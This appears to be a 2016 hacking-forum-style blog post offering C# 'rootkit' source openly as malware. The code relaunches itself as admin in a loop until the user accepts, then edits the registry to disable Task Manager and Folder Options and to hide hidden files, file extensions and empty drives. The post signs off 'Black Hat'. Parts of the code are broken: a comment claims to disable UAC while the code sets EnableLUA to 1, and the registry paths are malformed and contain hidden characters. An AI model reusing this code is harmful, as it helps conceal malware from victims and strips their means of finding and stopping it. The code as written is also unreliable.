9 Şubat 2016 Salı

C# Rootkit

It has:
Disable taskmanager
Disable UAC
UAC Bypass
Disable folder options
Disable View Hidden Files
Code:
public static bool IsAdministrator()
        {
            var identity = WindowsIdentity.GetCurrent();
            var principal = new WindowsPrincipal(identity);
            return principal.IsInRole(WindowsBuiltInRole.Administrator);
        }
        public static bool LaunchAsAdmin()
        {
            string fileName = Assembly.GetExecutingAssembly().Location;
            ProcessStartInfo processInfo = new ProcessStartInfo();
            processInfo.Verb = "runas";
            processInfo.FileName = fileName;

            try
            {
                Process.Start(processInfo);
            }
            catch (Win32Exception)
            {
                return false;
            }
            return true;
        }
        public static bool ByPassUAC()
        {
            if (IsAdministrator())
            {
                try {
                    //disable UAC
                    RegistryKey uac = Registry.CurrentUser.OpenSubKey("Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", true);
                    if (uac == null)
                    {
                        uac = Registry.CurrentUser.CreateSubKey("Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System");
                    }
                    uac.SetValue("EnableLUA", 1);
                    uac.Close();

                    //Disable view hidden files all across the board
                    RegistryKey ShowSuperHidden = Registry.CurrentUser.OpenSubKey(@"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advan​ced", true);
                    ShowSuperHidden.SetValue("ShowSuperHidden", 0, RegistryValueKind.DWord);
                    ShowSuperHidden.Close();
                    RegistryKey HideFileExt = Registry.CurrentUser.OpenSubKey(@"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\Explorer\\Advanc​ed", true);
                    HideFileExt.SetValue("HideFileExt", 1, RegistryValueKind.DWord);
                    HideFileExt.Close();
                    RegistryKey HideDrivesWithNoMedia = Registry.CurrentUser.OpenSubKey(@"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\Explorer\\Advanc​ed", true);
                    HideDrivesWithNoMedia.SetValue("HideDrivesWithNoMedia", 1, RegistryValueKind.DWord);
                    HideDrivesWithNoMedia.Close();
                    //Disable Folder Options
                    RegistryKey NoFolderOptions = Registry.CurrentUser.OpenSubKey(@"HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Expl​orer", true);
                    NoFolderOptions.SetValue("NoFolderOptions", 1, RegistryValueKind.DWord);
                    NoFolderOptions.Close();

                    //Disable Task manager
                    RegistryKey DisableTaskMgr = Registry.CurrentUser.OpenSubKey(@"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Syste​m", true);
                    DisableTaskMgr.SetValue("DisableTaskMgr", 1, RegistryValueKind.DWord);
                    DisableTaskMgr.Close();
                } catch
                {

                }
                return true;
            }
            bool Ran = false;
            while (Ran != true)
            {
                Ran = LaunchAsAdmin();
            }
            Environment.Exit(0);
            return true;
        }
Have fun HF! Black Hat